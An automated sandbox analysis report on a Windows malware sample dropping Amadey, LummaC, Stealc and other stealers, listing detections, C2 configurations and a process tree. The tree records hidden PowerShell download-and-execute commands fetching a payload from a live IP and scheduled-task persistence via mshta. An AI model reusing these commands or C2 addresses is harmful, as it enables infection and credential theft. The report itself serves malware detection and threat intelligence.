Edit tour

Windows Analysis Report
5c9465cda4.exe

Overview

General Information

Sample name:	5c9465cda4.exe
Analysis ID:	1630439
MD5:	1fa9c173c6abaae5709ca4b88db07aa5
SHA1:	dc77a5b0aeede04510ad4604ff58af13fd377609
SHA256:	3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247
Tags:	exeuser-Bastian455
Infos:

Detection

Amadey, GCleaner, LiteHTTP Bot, LummaC Stealer, Mint Stealer, PureLog Stealer, Stealc

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected GCleaner

Yara detected LiteHTTP Bot

Yara detected LummaC Stealer

Yara detected Mint Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected Stealc

Yara detected obfuscated html page

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Creates HTA files

Creates multiple autostart registry keys

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SGDT)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

5c9465cda4.exe (PID: 1272 cmdline: "C:\Users\user\Desktop\5c9465cda4.exe" MD5: 1FA9C173C6ABAAE5709CA4B88DB07AA5)

cmd.exe (PID: 5100 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3740 cmdline: schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 4080 cmdline: mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 3152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE (PID: 7280 cmdline: "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE" MD5: 09E00631D85EE0955F01A859559615F7)

rapes.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 09E00631D85EE0955F01A859559615F7)

mshta.exe (PID: 1868 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE (PID: 7760 cmdline: "C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE" MD5: 09E00631D85EE0955F01A859559615F7)

rapes.exe (PID: 7608 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 09E00631D85EE0955F01A859559615F7)

rapes.exe (PID: 7460 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 09E00631D85EE0955F01A859559615F7)

SvhQA35.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe" MD5: 9DA08B49CDCC4A84B4A722D1006C2AF8)

conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chromium.exe (PID: 7872 cmdline: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe MD5: 0EB68C59EAC29B84F81AD6522D396F59)

ce4pMzk.exe (PID: 1700 cmdline: "C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe" MD5: D39DF45E0030E02F7E5035386244A523)

zY9sqWs.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe" MD5: 2BB133C52B30E2B6B3608FDC5E7D7A22)

48dbed8457.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe" MD5: 15743C2914C612762EE60B2F12678ECF)

cmd.exe (PID: 908 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1820 cmdline: schtasks /create /tn EqihCmasJwG /tr "mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 2136 cmdline: mshta C:\Users\user\AppData\Local\Temp\SyboFREGa.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 1720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE (PID: 4444 cmdline: "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE" MD5: 09E00631D85EE0955F01A859559615F7)

cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10106680121\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2640 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 6176 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 6500 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 6816 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 7164 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

schtasks.exe (PID: 7924 cmdline: schtasks /create /tn "s9rWGma3f0H" /tr "mshta \"C:\Temp\4LrdSfC7c.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 7764 cmdline: mshta "C:\Temp\4LrdSfC7c.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

483d2fa8a0d53818306efeb32d3.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" MD5: 09E00631D85EE0955F01A859559615F7)

df7baf8347.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe" MD5: D4873846C90F3C15789B4DA8453AE20C)

mshta.exe (PID: 7940 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\SyboFREGa.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE (PID: 1068 cmdline: "C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE" MD5: 09E00631D85EE0955F01A859559615F7)

mshta.exe (PID: 7368 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\4LrdSfC7c.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 5992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: LummaC

{"C2 url": ["joyfulhezart.tech", "hardswarehub.today", "gadgethgfub.icu", "hardrwarehaven.run", "techmindzs.live", "codxefusion.top", "quietswtreams.life", "techspherxe.top"], "Build id": "1dacRP--worldmix10k"}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Threatname: GCleaner

{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\SyboFREGa.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x8fa0:$v1_1: newtask 0x7c45:$v1_7: DownloadFile 0x8f22:$cnc1: &os= 0x8f2c:$cnc2: &pv= 0x8f36:$cnc3: &ip= 0x8f40:$cnc4: &cn= 0x8f4a:$cnc5: &lr= 0x8f54:$cnc6: &ct= 0x8f5e:$cnc7: &bv= 0x8fb0:$cnc8: &op= 0x8fbe:$cnc9: &td= 0x8fd2:$cnc10: &uni=
C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x8fa0:$v1_1: newtask 0x7c45:$v1_7: DownloadFile 0x8f22:$cnc1: &os= 0x8f2c:$cnc2: &pv= 0x8f36:$cnc3: &ip= 0x8f40:$cnc4: &cn= 0x8f4a:$cnc5: &lr= 0x8f54:$cnc6: &ct= 0x8f5e:$cnc7: &bv= 0x8fb0:$cnc8: &op= 0x8fbe:$cnc9: &td= 0x8fd2:$cnc10: &uni=
C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x8fa0:$v1_1: newtask 0x7c45:$v1_7: DownloadFile 0x8f22:$cnc1: &os= 0x8f2c:$cnc2: &pv= 0x8f36:$cnc3: &ip= 0x8f40:$cnc4: &cn= 0x8f4a:$cnc5: &lr= 0x8f54:$cnc6: &ct= 0x8f5e:$cnc7: &bv= 0x8fb0:$cnc8: &op= 0x8fbe:$cnc9: &td= 0x8fd2:$cnc10: &uni=
C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Temp\4LrdSfC7c.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 8 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000040.00000002.2948533861.000000000DF1E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000040.00000002.2948533861.000000000DE18000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2545323720.000001D127CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MintStealer	Yara detected Mint Stealer	Joe Security
0000000C.00000003.1767560692.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000014.00000003.2240830062.0000000004D40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000A.00000002.1767399937.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000030.00000002.2780738484.0000000000501000.00000040.00000001.01000000.00000043.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000040.00000002.2948533861.000000000DE70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000002E.00000002.2723583767.0000000000501000.00000040.00000001.01000000.00000043.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000040.00000002.2948533861.000000000DE44000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000040.00000002.2950683362.000000000E0DC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000002E.00000003.2682259551.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000D.00000003.1788630299.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000041.00000003.2780159007.0000000004970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000030.00000003.2738904181.0000000004C80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
00000040.00000002.2948533861.000000000DEC8000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000B.00000002.1802597444.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000021.00000003.2746445267.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000003.1727074153.0000000005100000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000040.00000002.2948533861.000000000DE9C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000C.00000002.1807784692.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000040.00000002.2948533861.000000000DFAE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000002.1829256764.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000040.00000003.2872264238.000000000E08A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000040.00000002.2950203188.000000000E092000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000B.00000003.1762219821.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000041.00000002.2821715122.0000000000231000.00000040.00000001.01000000.00000045.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Process Memory Space: mshta.exe PID: 4080	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3152	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 1868	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7184	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: chromium.exe PID: 7872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: chromium.exe PID: 7872	JoeSecurity_MintStealer	Yara detected Mint Stealer	Joe Security
Process Memory Space: ce4pMzk.exe PID: 1700	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
Process Memory Space: mshta.exe PID: 2136	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.0.ce4pMzk.exe.21039bd3fe8.1.unpack	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
28.0.ce4pMzk.exe.21039bd3fe8.1.unpack	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x4fb8:$v1_1: newtask 0x3c5d:$v1_7: DownloadFile 0x4f3a:$cnc1: &os= 0x4f44:$cnc2: &pv= 0x4f4e:$cnc3: &ip= 0x4f58:$cnc4: &cn= 0x4f62:$cnc5: &lr= 0x4f6c:$cnc6: &ct= 0x4f76:$cnc7: &bv= 0x4fc8:$cnc8: &op= 0x4fd6:$cnc9: &td= 0x4fea:$cnc10: &uni=
64.2.df7baf8347.exe.de44000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
64.2.df7baf8347.exe.de9c000.5.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
64.3.df7baf8347.exe.e092000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
28.0.ce4pMzk.exe.21039bd3fe8.1.raw.unpack	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x6db8:$v1_1: newtask 0x5a5d:$v1_7: DownloadFile 0x6d3a:$cnc1: &os= 0x6d44:$cnc2: &pv= 0x6d4e:$cnc3: &ip= 0x6d58:$cnc4: &cn= 0x6d62:$cnc5: &lr= 0x6d6c:$cnc6: &ct= 0x6d76:$cnc7: &bv= 0x6dc8:$cnc8: &op= 0x6dd6:$cnc9: &td= 0x6dea:$cnc10: &uni=
33.2.zY9sqWs.exe.f50000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
